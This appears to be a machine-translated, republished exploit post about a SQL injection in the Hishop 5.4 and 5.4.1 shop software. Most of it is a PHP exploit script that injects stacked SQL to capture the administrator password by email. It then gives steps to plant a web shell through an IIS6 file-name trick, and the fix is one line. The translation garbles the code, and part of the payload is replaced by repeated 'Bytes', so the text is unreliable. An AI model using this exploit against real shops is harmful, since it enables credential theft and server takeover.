Hishop 5.4 & amp; 5.4.1 online shop system SQL injection vulnerability and repair

Source: Internet
Author: User

Hishop online shop system V5.4 official version is a B2C online shopping mall system developed independently based on the B/S architecture of WEB applications on the Hao network. It provides the best protection for enterprises and large and medium-sized network merchants, to meet customers' current and future independent online shop application needs. The system runs on Microsoft's. NET platform and uses the latest ASP. NET 2.0 technology for hierarchical development. With more than 0.3 million of users in 9 years of extensive application and detection of complex environments, the system has a good reputation in terms of security, stability, and ease of use. V5.4 official version adds many practical functions such as group buying and time-limited flash sales on the basis of the official version 5.3. features are fully optimized and the system is upgraded.

Hishop has not exploded since 5.1 and 5.1.3 ..

An injection point was found some time ago, but the statement is a bit complicated and the underline is also filtered (the table name contains underlines). Therefore, it must be specially constructed, this injection point can be used with iis6 to get the shell.

Select this type of URL




 

------------------------------- Start of EXP code -----------------------------------
<? Php
Print_r ('
+ ------------------------- +
Hishop 5.4 & 5.4.1 SQL injection exploit Data: 2011.6.9
+ ------------------------- +
');
If ($ argc <3 ){
Print_r ('
+ ------------------------- +
Usage: php '. $ argv [0]. 'Host Port Path RegMail
Example:
Php '. $ argv [0].' localhost 80/SHOES/category-92.aspx? ValueStr = 35_0 syc@myclover.org
+ ------------------------- +
');
Exit;
}
$ Host = $ argv [1];
$ Port = $ argv [2];
$ Path = $ argv [3];
$ Mail = $ argv [4];
$ Expdata = "";
For ($ I = 0; $ I <strlen ($ mail); $ I ++)
$ Expdata = $ expdata. dechex (ord ($ mail [$ I]). "00 ″;
$ Expdata = strtoupper ($ expdata );
$ Expdata = "% 27) % 20or % 201 = 1; DECLARE % 20 @ S % 20 NVARCHAR (4000) % 20 SET % 20 @ S = CAST (Broadcast

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

45006D00610069006C003D002700 ". $ expdata." 2700% 20AS % 20 NVARCHAR (4000) % 20 EXEC (@ S );-";
GET ($ host, $ port, $ path, $ expdata, 30 );
Function GET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = "){
$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, 30 );
If (! $ Fp ){
Echo "{$ errstr} ({$ errno}) <br/> ";
Exit;
}

$ Out = "GET $ path $ data HTTP/1.1 ";
$ Out. = "Host: $ host: $ port ";
$ Out. = "Connection: CLOSE ";

Fwrite ($ fp, $ out );
While (! Feof ($ fp )){
Fgets ($ fp, 128 );
}
Fclose ($ fp );
}
Print_r ('
+ ------------------------- +
[+] Get Manager Password
[1] Go to [Login]-> [my account]-> [Personal Information]
[2] The email contains the administrator password.
[3] Good Luck!
+ ------------------------- +
[+] Get WebShell (IIS6)
[1] log on to the background/admin/[product management]-"[Category template settings]
[2] upload 1.asp;.html
[3] Shell address: http://www.bkjia.com/Themes/default/zh-cn/categorythemes/1.asp;.html
+ ------------------------- +
');
?>



Www.2cto.com provides repair: enhanced filtering. I have been wondering whether to upgrade to win2008 recently. iis7 is reliable.


 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.